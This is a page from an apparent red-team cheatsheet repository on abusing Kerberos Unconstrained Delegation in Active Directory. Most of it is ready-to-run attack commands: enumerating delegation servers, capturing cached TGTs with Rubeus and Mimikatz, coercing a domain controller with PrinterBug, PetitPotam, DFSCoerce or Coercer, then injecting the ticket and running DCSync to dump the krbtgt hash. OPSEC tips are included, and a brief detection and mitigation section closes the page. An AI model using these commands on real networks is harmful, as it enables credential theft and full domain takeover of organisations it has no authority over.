daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-15-unconstrained-delegation-abuse.md (10220B)


      1 ---
      2 title: "Attack #15 β€” Unconstrained Delegation Abuse"
      3 description: "Unconstrained Delegation is a legacy Kerberos feature that allows a service to impersonate any user to any other service in the domain. When a computer…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "delegation"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #15 β€” Unconstrained Delegation Abuse.md"
     11 ---
     12 # 🟠 Attack #15 β€” Unconstrained Delegation Abuse
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Unconstrained Delegation is a legacy Kerberos feature that allows a service to **impersonate any user to any other service** in the domain. When a computer object is configured with the `TRUSTED_FOR_DELEGATION` flag, any user authenticating to that computer via Kerberos **sends their entire TGT** inside the service ticket β€” and the computer caches it in LSASS memory. If an attacker compromises a server with Unconstrained Delegation, they can extract every cached TGT from memory and impersonate those users to any service in the domain.
     19 
     20 The critical escalation path is **coercing a Domain Controller to authenticate** to the compromised server. Since DCs are computer accounts, their TGT carries machine-level privileges. With the DC's TGT, the attacker can perform DCSync and achieve full domain compromise.
     21 
     22 ### The Full Attack Flow
     23 
     24 ```
     25 1. Enumerate servers with TRUSTED_FOR_DELEGATION flag
     26 2. Compromise one of those servers (local admin required)
     27 3. Set up Rubeus monitor to capture incoming TGTs
     28 4. Coerce the DC to authenticate to your compromised server
     29    - PrinterBug / SpoolSample (MS-RPRN)
     30    - PetitPotam (MS-EFSR)
     31    - DFSCoerce (MS-DFSNM)
     32 5. DC authenticates β†’ its TGT is cached on your server
     33 6. Extract the DC's TGT from LSASS memory
     34 7. Inject the DC's TGT β†’ DCSync β†’ own the domain
     35 ```
     36 
     37 ***
     38 
     39 ## βš™οΈ Prerequisites
     40 
     41 | Requirement | Detail |
     42 |---|---|
     43 | **Local admin on Unconstrained Delegation server** | Required to extract TGTs from LSASS |
     44 | **Unconstrained Delegation server exists** | Computer object with `TRUSTED_FOR_DELEGATION` flag |
     45 | **Network access to coerce DC** | Must reach DC on RPC ports for coercion |
     46 | **Print Spooler or EFS service running on DC** | For coercion methods to work |
     47 
     48 ***
     49 
     50 ## πŸ› οΈ Tools
     51 
     52 | Tool | Platform | Notes |
     53 |---|---|---|
     54 | **Rubeus** | Windows | `monitor` mode to capture incoming TGTs in real-time |
     55 | **Mimikatz** | Windows | `sekurlsa::tickets /export` to dump cached tickets |
     56 | **SpoolSample** | Windows | PrinterBug coercion β€” forces DC to auth to you |
     57 | **printerbug.py** | Linux | Impacket PrinterBug β€” remote coercion from Linux |
     58 | **PetitPotam** | Linux/Windows | MS-EFSR coercion β€” no authentication required in some versions |
     59 | **DFSCoerce** | Linux | MS-DFSNM coercion |
     60 | **Coercer** | Linux | Multi-protocol coercion toolkit |
     61 | **PowerView** | Windows | Enumerate Unconstrained Delegation servers |
     62 | **BloodHound** | Both | Visual identification of delegation targets |
     63 
     64 ***
     65 
     66 ## πŸ’» Full Commands
     67 
     68 ### πŸ”΅ Step 1 β€” Enumerate Unconstrained Delegation Servers
     69 
     70 ```powershell
     71 # ── PowerView ─────────────────────────────────────────────────────────────────
     72 Import-Module .\PowerView.ps1
     73 Get-DomainComputer -Unconstrained | Select-Object samaccountname, dnshostname, useraccountcontrol
     74 # Ignore Domain Controllers β€” they always have Unconstrained Delegation
     75 
     76 # ── AD Module ─────────────────────────────────────────────────────────────────
     77 Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, DNSHostName |
     78   Select-Object Name, DNSHostName, TrustedForDelegation
     79 
     80 # ── LDAP Filter ───────────────────────────────────────────────────────────────
     81 Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" -Properties DNSHostName
     82 ```
     83 
     84 ```bash
     85 # ── Linux β€” BloodHound.py + Impacket ──────────────────────────────────────────
     86 findDelegation.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     87 # Shows all delegation types: Unconstrained, Constrained, RBCD
     88 
     89 # ── NetExec ───────────────────────────────────────────────────────────────────
     90 nxc ldap DC01.corp.local -u low_user -p 'Password1' --trusted-for-delegation
     91 ```
     92 
     93 ### πŸ”΄ Step 2 β€” Monitor for Incoming TGTs (On Compromised Server)
     94 
     95 ```powershell
     96 # ── Rubeus monitor mode β€” capture TGTs as they arrive ─────────────────────────
     97 .\Rubeus.exe monitor /interval:5 /nowrap
     98 # Runs continuously, printing base64-encoded TGTs as users authenticate
     99 # Wait for the DC's TGT after triggering coercion
    100 
    101 # ── Rubeus monitor with filter for specific user ──────────────────────────────
    102 .\Rubeus.exe monitor /interval:5 /targetuser:DC01$ /nowrap
    103 # Only shows TGTs from the DC machine account
    104 
    105 # ── Alternative: Mimikatz β€” dump all cached tickets ──────────────────────────
    106 privilege::debug
    107 sekurlsa::tickets /export
    108 # Exports all TGTs as .kirbi files from LSASS memory
    109 ```
    110 
    111 ### πŸ”΄ Step 3 β€” Coerce DC Authentication
    112 
    113 ```bash
    114 # ── PrinterBug / SpoolSample (MS-RPRN) ────────────────────────────────────────
    115 # Forces DC to authenticate to your compromised server via Print Spooler
    116 printerbug.py corp.local/low_user:'Password1'@DC01.corp.local COMPROMISED_SERVER.corp.local
    117 # DC01 will auth to COMPROMISED_SERVER β†’ TGT cached
    118 
    119 # ── PetitPotam (MS-EFSR) β€” often works unauthenticated ───────────────────────
    120 python3 PetitPotam.py COMPROMISED_SERVER.corp.local DC01.corp.local
    121 # Or with credentials:
    122 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
    123   COMPROMISED_SERVER.corp.local DC01.corp.local
    124 
    125 # ── DFSCoerce (MS-DFSNM) ─────────────────────────────────────────────────────
    126 python3 dfscoerce.py -u low_user -p 'Password1' -d corp.local \
    127   COMPROMISED_SERVER.corp.local DC01.corp.local
    128 
    129 # ── Coercer (multi-protocol) ─────────────────────────────────────────────────
    130 coercer coerce -u low_user -p 'Password1' -d corp.local \
    131   -l COMPROMISED_SERVER.corp.local -t DC01.corp.local
    132 ```
    133 
    134 ```powershell
    135 # ── Windows β€” SpoolSample.exe ─────────────────────────────────────────────────
    136 .\SpoolSample.exe DC01.corp.local COMPROMISED_SERVER.corp.local
    137 ```
    138 
    139 ### πŸ”΄ Step 4 β€” Extract and Use DC's TGT
    140 
    141 ```powershell
    142 # ── Rubeus β€” inject the captured DC TGT ──────────────────────────────────────
    143 .\Rubeus.exe ptt /ticket:<base64_encoded_DC_TGT_from_monitor>
    144 
    145 # ── DCSync with the DC's ticket ──────────────────────────────────────────────
    146 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
    147 
    148 # ── Verify ────────────────────────────────────────────────────────────────────
    149 klist
    150 dir \\DC01.corp.local\C$
    151 ```
    152 
    153 ```bash
    154 # ── Linux β€” convert and use ───────────────────────────────────────────────────
    155 # If you captured a .kirbi file, convert to .ccache:
    156 ticketConverter.py dc01_tgt.kirbi dc01_tgt.ccache
    157 
    158 export KRB5CCNAME=dc01_tgt.ccache
    159 secretsdump.py -k -no-pass corp.local/DC01\$@DC01.corp.local
    160 ```
    161 
    162 ***
    163 
    164 ## 🎯 OPSEC Tips
    165 
    166 - **Rubeus `monitor` mode is preferred** over Mimikatz for real-time TGT capture β€” it catches tickets as they arrive
    167 - **PrinterBug requires Print Spooler running on DC** β€” check first with `ls \\DC01\pipe\spoolss`
    168 - **PetitPotam may work unauthenticated** on unpatched DCs β€” most valuable coercion method
    169 - **DCs always have Unconstrained Delegation** β€” they're not your targets; look for NON-DC servers with the flag
    170 
    171 ***
    172 
    173 ## πŸ›‘οΈ Detection β€” Event IDs
    174 
    175 | Event ID | Source | What to Look For |
    176 |---|---|---|
    177 | **4624** | Security Log | DC machine account (DC01$) authenticating to a workstation β€” unusual |
    178 | **4768** | Security Log | TGT request patterns associated with coercion |
    179 | **4769** | Security Log | TGS requests using the DC's captured TGT from non-DC source |
    180 | **5145** | Security Log | Network share access from the coerced DC to the attacker's host |
    181 
    182 ***
    183 
    184 ## πŸ”— Attack Chain Context
    185 
    186 ```
    187 [Unconstrained Delegation] ──→ DC TGT Theft β†’ Domain Compromise
    188          β”‚
    189          β”œβ”€β”€β†’ πŸ–¨οΈ Coerce DC via PrinterBug/PetitPotam β†’ capture DC TGT
    190          β”œβ”€β”€β†’ 🩸 DC TGT β†’ DCSync β†’ KRBTGT hash β†’ Golden Ticket
    191          β”œβ”€β”€β†’ πŸ”— Requires: local admin on UD server + coercion method
    192          β”œβ”€β”€β†’ πŸ”— Chain with: PetitPotam (#41), PrinterBug (#42)
    193          └──→ πŸ’€ Defeated by: remove UD flag, disable Spooler on DCs, Protected Users
    194 ```
    195 
    196 ***
    197 
    198 > βœ… **Attack #15 β€” Unconstrained Delegation complete.**